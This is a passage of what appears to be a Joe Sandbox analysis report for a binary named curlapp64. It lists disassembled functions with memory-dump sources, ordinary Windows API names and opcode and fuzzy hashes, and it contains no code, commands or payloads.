                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: closesocketsocket
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2760038618-0
                                                                                                                                                                                                  • Opcode ID: 27b388f8f4bc6737c7fb520ec9b203deaa45030ab93c0741097e461f5fa6597e
                                                                                                                                                                                                  • Instruction ID: 60c9b3d4c47e2b966960d66da44125d7601f2ada8319e8b8d76bee28f48c7043
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27b388f8f4bc6737c7fb520ec9b203deaa45030ab93c0741097e461f5fa6597e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24016912A05BC587FB948BBAA4853AD1750DF55FA5F4C8278CA2D16AE2CEAC48D98310
                                                                                                                                                                                                  Function 00007FF8B7E78EA0 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireRelease
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 17069307-0
                                                                                                                                                                                                  • Opcode ID: 39a519f4624760cd79ac458549f5595ef9daf227755beea38229d5db3c9119c4
                                                                                                                                                                                                  • Instruction ID: f751c7767f8476f7c63b13a7d60cde7a6a2a5047e8a8b54b4c0dc1abd3cc6621
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 39a519f4624760cd79ac458549f5595ef9daf227755beea38229d5db3c9119c4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BD05EA8F2470282FB146F78ACC40BC22B1AF5CB51F441434CA1E46371FE2CA88CC311
                                                                                                                                                                                                  Function 00007FF8B7E998C0 Relevance: 2.6, APIs: 2, Instructions: 84COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                  • Opcode ID: 72d2dbb8c05805521502d31913c7e2dcfda900fa91af8ab57f2baabed37d7821
                                                                                                                                                                                                  • Instruction ID: 969d18adfa27d9ad1cbb8e09ebbcceeca9d61739d4e85763c792b889a9bf94fa
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72d2dbb8c05805521502d31913c7e2dcfda900fa91af8ab57f2baabed37d7821
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3318D22B0C74286EB58AAAE95803BD6395AF89FC4F440435EF4E437A5EF3DE4508350
                                                                                                                                                                                                  Function 00007FF8B7E9BA90 Relevance: 2.5, APIs: 2, Instructions: 19COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                  • Opcode ID: 2364130e8387a22c3592681a25188552cd3fa5a9530cb017d00036b0f9dc0d87
                                                                                                                                                                                                  • Instruction ID: a80a31ce38cfeaa7ae3d5d106c47ae758804d6dbd51804ee5fc186ae506c3456
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2364130e8387a22c3592681a25188552cd3fa5a9530cb017d00036b0f9dc0d87
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3BF01C32104BC280C7508F29F9443E973A8EBA8FC8F194035CFA90A769CE7880908720
                                                                                                                                                                                                  Function 00007FF6CF9B3586 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3947729631-0
                                                                                                                                                                                                  • Opcode ID: 360eecc09cc7c927c32e308d07e9fdaaea6b9da2091d04eac59be863e8c61b53
                                                                                                                                                                                                  • Instruction ID: 0006d302f7e87a959233a3b34f76ce0a0ac44f2e9fa487f22a3d6572fb19623d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 360eecc09cc7c927c32e308d07e9fdaaea6b9da2091d04eac59be863e8c61b53
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF214B31E08742CAEF60DF64C4466BC37A4EB54719F240A39D6DD82A8ADF79D445C760
                                                                                                                                                                                                  Function 00007FF6CF9B24E0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: 0428f7daac319404611c2444f1606148140d2481127d28af03691f15706ef5a8
                                                                                                                                                                                                  • Instruction ID: 4ea7cfbcbcd277544d7942e163c17fc5eddb0723b76e3363aaa38d357080b48c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0428f7daac319404611c2444f1606148140d2481127d28af03691f15706ef5a8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C11D221E0C64282EE71AF0194102BAA3A5FFC5B81F144835EACC87A8FDF7CD4008762
                                                                                                                                                                                                  Function 00007FF6CF9C3320 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: f8903f54cb2d0fbb3a88a513d88418b95db85bf5a2bab48c430c50da01420267
                                                                                                                                                                                                  • Instruction ID: fdabf0d1ed659a5563be715044f06d81db75c26dbb3af9b82d440c69b7d4ea8a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f8903f54cb2d0fbb3a88a513d88418b95db85bf5a2bab48c430c50da01420267
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30216232A18A8286EF61AF19E44077977A0FB84B55F644234E69E876DEDF3DD8018B10
                                                                                                                                                                                                  Function 00007FF8B7E68230 Relevance: 1.5, APIs: 1, Instructions: 46networkCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: socket
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 98920635-0
                                                                                                                                                                                                  • Opcode ID: 4b996f48484ad4d943085cdf321c2f5f56c4e47a803c815960622bae58fff54d
                                                                                                                                                                                                  • Instruction ID: d59be9279e2ad85eb7d704869090bb9be1a920304b76c10452f94ec7c87bfc6a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b996f48484ad4d943085cdf321c2f5f56c4e47a803c815960622bae58fff54d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC111C32A09A8182D7548B6AE18426D76A1EF49FA4F088635DBAD57BA5CF3CE491C700
                                                                                                                                                                                                  Function 00007FF8B7E68110 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: closesocket
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2781271927-0
                                                                                                                                                                                                  • Opcode ID: f5e5c931f568ed04444b0b36d0a8910c15cb7555877ea71fb8bd6f2f63156bad
                                                                                                                                                                                                  • Instruction ID: cd0d5583928acc798c7294a0be24ad6d0f8fa4874cefb03c1714f214e7d780f6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5e5c931f568ed04444b0b36d0a8910c15cb7555877ea71fb8bd6f2f63156bad
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6019261B1875141EA549B6BA44422E9350AF48FE4F4C5230EF6E5BBE9CE3CE4958700
                                                                                                                                                                                                  Function 00007FF8B7E748E0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _beginthreadex
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3014514943-0
                                                                                                                                                                                                  • Opcode ID: 12d530c60010292d5cdc75557250193eb43d1c307b29f796c6545e99bf5471df
                                                                                                                                                                                                  • Instruction ID: ad0d7e62b60fd9a5008a7497358000d281a2659b8fbbc26a8840bef734ba101f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12d530c60010292d5cdc75557250193eb43d1c307b29f796c6545e99bf5471df
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3E08CA6B1974082AE244B7A6841029E2916F48BB1B4C47389E7C863E0DB3CA2914820
                                                                                                                                                                                                  Function 00007FF6CF9B60DC Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __vcrt_uninitialize_ptd
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1180542099-0
                                                                                                                                                                                                  • Opcode ID: 8bdc3493c57d326d10743a22c5efe28bfaae284d337f35702c7339504161e960
                                                                                                                                                                                                  • Instruction ID: 841c12b3ae64fdb9615c03c806a4f40c415f302e7d5c1f8bd7b6df8274cae426
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8bdc3493c57d326d10743a22c5efe28bfaae284d337f35702c7339504161e960
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11E04F60D0D28290FD756F7024420B813A02F69317F500EB5D4EEC22DFDE1C71555632
                                                                                                                                                                                                  Function 00007FF6CF9A4288 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6CF9A429C
                                                                                                                                                                                                    • Part of subcall function 00007FF6CF9A5E80: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF6CF9A5E88
                                                                                                                                                                                                    • Part of subcall function 00007FF6CF9A5E80: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF6CF9A5E8D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1208906642-0
                                                                                                                                                                                                  • Opcode ID: cc4600dbc0be7681400d59c1cfd8b886fbfdb3416440da6dc4029802db45df17
                                                                                                                                                                                                  • Instruction ID: ce5ed042a54456dd233d9f82c34ec52f872077dfc343095f713ffe93b2b3f49e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc4600dbc0be7681400d59c1cfd8b886fbfdb3416440da6dc4029802db45df17
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50E0B660E1C28395FEA92EA512422B917C01F6130BF600478DCCDC659F8D0F34461231
                                                                                                                                                                                                  Function 00007FF8B7E78E40 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32 ref: 00007FF8B7E78E4B
                                                                                                                                                                                                    • Part of subcall function 00007FF8B7EAFDE0: FreeLibrary.KERNEL32(?,?,?,00007FF8B7E78E7B), ref: 00007FF8B7EAFDF4
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AcquireExclusiveFreeLibraryLock
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 925248277-0
                                                                                                                                                                                                  • Opcode ID: cc9ee07f75f5eb5ef911d757bfaaaba6d461f08265da5f81e9781ee851d7004a
                                                                                                                                                                                                  • Instruction ID: 355b4f4425ce01ba66603b08e298073f66f6ee820f1a0aa133ac2206460f69cc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc9ee07f75f5eb5ef911d757bfaaaba6d461f08265da5f81e9781ee851d7004a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03F092B4D087428AF694AB2CEC512BD36E4AF10BD0F140535D22C892F5EF6DA544CB26
                                                                                                                                                                                                  Function 00007FF6CF9B8410 Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                                                                  • Opcode ID: 274343b1df128302e0ad9f61dfa13d56a919f165eb85e91df2f31c8fbe074bb0
                                                                                                                                                                                                  • Instruction ID: 9fe6e33555517ddbc356072ebdc805ab6acadb2ecde162f7d625ac8350f2c4f2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 274343b1df128302e0ad9f61dfa13d56a919f165eb85e91df2f31c8fbe074bb0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90D0C925B35541C3E7449F51E885BA56328F798702F901026E98AC26948F7CC299CB20
                                                                                                                                                                                                  Function 00007FF8B7E74810 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
